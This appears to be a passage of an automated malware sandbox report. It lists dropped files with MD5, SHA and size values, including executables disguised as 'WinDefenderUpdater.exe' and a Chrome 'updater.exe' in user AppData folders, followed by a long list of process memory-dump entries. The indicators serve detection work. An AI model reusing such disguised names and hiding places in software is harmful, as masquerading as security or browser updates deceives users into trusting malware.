ea3da2c63aeaaf1bf692e24ee296598f2d3ce46efd9ca21ae8577548d5705f7e

SHA512
efbedf7b584b233651989a8393d7dcb1ae84944fbdda9fd2e9dd49b27875d31e502d7cd35bffa77e771c6d8f3e36aa5669d3ac24f76ddcd5b78dc6e9a2268e17

Download Submit
C:\Users\Admin\AppData\Local\Temp\WinDefenderUpdater.exe
Filesize
2.5MB

MD5
42cb921e726d99dd48588d9782f3eb0f

SHA1
d6c46db0c9a2f2b65ad4113c4ee388837c15da4f

SHA256
ea3da2c63aeaaf1bf692e24ee296598f2d3ce46efd9ca21ae8577548d5705f7e

SHA512
efbedf7b584b233651989a8393d7dcb1ae84944fbdda9fd2e9dd49b27875d31e502d7cd35bffa77e771c6d8f3e36aa5669d3ac24f76ddcd5b78dc6e9a2268e17

Download Submit
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
Filesize
7.0MB

MD5
28bc5e41ab8fd6c319a24416d4f590e6

SHA1
5e20315a9fb794f660b30072556525ad1503a2e4

SHA256
db6408c654a3bc4b89f888a6d231ea4c391f048af1f516e8be94c512bf317b20

SHA512
efa99980959919a16699d11bfa172bbdeb1b505d296398ede7af5d25b44575f237243a64e35016fca4847b1852e6146d23c9583e8c2e569c8dab58ab714ab844

Download Submit
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
Filesize
7.0MB

MD5
28bc5e41ab8fd6c319a24416d4f590e6

SHA1
5e20315a9fb794f660b30072556525ad1503a2e4

SHA256
db6408c654a3bc4b89f888a6d231ea4c391f048af1f516e8be94c512bf317b20

SHA512
efa99980959919a16699d11bfa172bbdeb1b505d296398ede7af5d25b44575f237243a64e35016fca4847b1852e6146d23c9583e8c2e569c8dab58ab714ab844

Download Submit
C:\Users\Admin\AppData\Roaming\Google\Libs\g.log
Filesize
226B

MD5
fdba80d4081c28c65e32fff246dc46cb

SHA1
74f809dedd1fc46a3a63ac9904c80f0b817b3686

SHA256
b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

SHA512
b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

Download Submit
memory/376-205-0x0000000000000000-mapping.dmp

Download
memory/1220-207-0x000002C3C17B0000-0x000002C3C17D0000-memory.dmp

Filesize
128KB

Download
memory/1220-206-0x00007FF60B9425D0-mapping.dmp

Download
memory/1220-211-0x00007FF60B150000-0x00007FF60B944000-memory.dmp

Filesize
8.0MB

Download
memory/1220-212-0x00007FF60B150000-0x00007FF60B944000-memory.dmp

Filesize
8.0MB

Download
memory/1552-203-0x0000000000000000-mapping.dmp

Download
memory/2184-134-0x0000000000000000-mapping.dmp

Download
memory/2240-166-0x00007FFB852B0000-0x00007FFB85D71000-memory.dmp

Filesize
10.8MB

Download
memory/2240-147-0x00007FFB852B0000-0x00007FFB85D71000-memory.dmp

Filesize
10.8MB

Download
memory/2240-137-0x0000000000000000-mapping.dmp

Download
memory/2240-140-0x00000000002B0000-0x0000000000326000-memory.dmp

Filesize
472KB

Download
memory/2388-202-0x00007FF661C014E0-mapping.dmp

Download
memory/2884-194-0x00007FF7B6A40000-0x00007FF7B76E7000-memory.dmp

Filesize
12.7MB

Download
memory/2884-189-0x00007FF7B6A40000-0x00007FF7B76E7000-memory.dmp

Filesize
12.7MB

Download
memory/2884-193-0x00007FF7B6A40000-0x00007FF7B76E7000-memory.dmp

Filesize
12.7MB

Download
memory/2884-192-0x00007FF7B6A40000-0x00007FF7B76E7000-memory.dmp

Filesize
12.7MB

Download
memory/2884-195-0x00007FF7B6A40000-0x00007FF7B76E7000-memory.dmp

Filesize
12.7MB

Download
memory/2884-191-0x00007FF7B6A40000-0x00007FF7B76E7000-memory.dmp

Filesize
12.7MB

Download
memory/2884-190-0x00007FFBA3FB0000-0x00007FFBA41A5000-memory.dmp

Filesize
2.0MB

Download
memory/2884-210-0x00007FFBA3FB0000-0x00007FFBA41A5000-memory.dmp

Filesize
2.0MB

Download
memory/2884-196-0x00007FF7B6A40000-0x00007FF7B76E7000-memory.dmp

Filesize
12.7MB

Download
memory/2884-208-0x00007FF7B6A40000-0x00007FF7B76E7000-memory.dmp

Filesize
12.7MB

Download
memory/2884-197-0x00007FFBA3FB0000-0x00007FFBA41A5000-memory.dmp

Filesize
2.0MB

Download
memory/3256-182-0x0000000000000000-mapping.dmp

Download
memory/4140-181-0x00007FFB852B0000-0x00007FFB85D71000-memory.dmp

Filesize
10.8MB

Download
memory/4140-184-0x00007FFB852B0000-0x00007FFB85D71000-memory.dmp

Filesize
10.8MB

Download
memory/4140-176-0x0000000000000000-mapping.dmp

Download
memory/4548-151-0x00007FF72EC90000-0x00007FF72F937000-memory.dmp

Filesize
12.7MB

Download
memory/4548-148-0x00007FF72EC90000-0x00007FF72F937000-memory.dmp

Filesize
12.7MB

Download
memory/4548-178-0x00007FFBA3FB0000-0x00007FFBA41A5000-memory.dmp

Filesize
2.0MB

Download
memory/4548-177-0x00007FF72EC90000-0x00007FF72F937000-memory.dmp

Filesize
12.7MB

Download
memory/4548-132-0x0000000000000000-mapping.dmp

Download
memory/4548-143-0x00007FF72EC90000-0x00007FF72F937000-memory.dmp

Filesize
12.7MB

Download
memory/4548-145-0x00007FFBA3FB0000-0x00007FFBA41A5000-memory.dmp

Filesize
2.0MB

Download
memory/4548-164-0x00007FF72EC90000-0x00007FF72F937000-memory.dmp

Filesize
12.7MB

Download
memory/4548-165-0x00007FFBA3FB0000-0x00007FFBA41A5000-memory.dmp

Filesize
2.0MB

Download
memory/4548-144-0x00007FF72EC90000-0x00007FF72F937000-memory.dmp

Filesize
12.7MB

Download
memory/4548-146-0x00007FF72EC90000-0x00007FF72F937000-memory.dmp

Filesize
12.7MB

Download
memory/4548-150-0x00007FF72EC90000-0x00007FF72F937000-memory.dmp

Filesize
12.7MB

Download
memory/4548-149-0x00007FF72EC90000-0x00007FF72F937000-memory.dmp

Filesize
12.7MB

Download
memory/4572-170-0x0000000000000000-mapping.dmp

Download
memory/4572-171-0x0000025BD8720000-0x0000025BD8742000-memory.dmp

Filesize
136KB

Download
memory/4572-174-0x00007FFB852B0000-0x00007FFB85D71000-memory.dmp

Filesize
10.8MB

Download
memory/4572-175-0x00007FFB852B0000-0x00007FFB85D71000-memory.dmp

Filesize
10.8MB

Download
memory/4612-201-0x00007FFB852B0000-0x00007FFB85D71000-memory.dmp

Filesize
10.8MB

Download
memory/4612-198-0x0000000000000000-mapping.dmp

Download
memory/4612-199-0x00007FFB852B0000-0x00007FFB85D71000-memory.dmp

Filesize
10.8MB

Download
memory/4748-204-0x0000000000000000-mapping.dmp

Download
memory/43916-152-0x0000000000000000-mapping.dmp

Download
memory/88640-162-0x0000000005360000-0x000000000546A000-memory.dmp

Filesize
1.0MB

Download
memory/88640-155-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/88640-160-0x00000000057C0000-0x0000000005DD8000-memory.dmp

Filesize
6.1MB

Download
memory/88640-154-0x0000000000000000-mapping.dmp

Download
memory/88640-161-0x0000000005230000-0x0000000005242000-memory.dmp

Filesize
72KB

Download
memory/88640-163-0x0000000005290000-0x00000000052CC000-memory.dmp

Filesize
240KB

Download
memory/88640-167-0x0000000006390000-0x0000000006934000-memory.dmp

Filesize
5.6MB

Download
memory/88640-168-0x0000000005DE0000-0x0000000005E72000-memory.dmp

Filesize
584KB

Download
memory/88640-169-0x00000000056F0000-0x0000000005756000-memory.dmp

Filesize
408KB

Download
memory/88640-188-0x00000000081B0000-0x00000000086DC000-memory.dmp

Filesize
5.2MB

Download
memory/88640-186-0x0000000007AB0000-0x0000000007C72000-memory.dmp

Filesize
1.8MB

Download
memory/88640-172-0x0000000006240000-0x00000000062B6000-memory.dmp

Filesize
472KB

Download
memory/88640-173-0x0000000006300000-0x000000000631E000-memory.dmp

Filesize
120KB

Download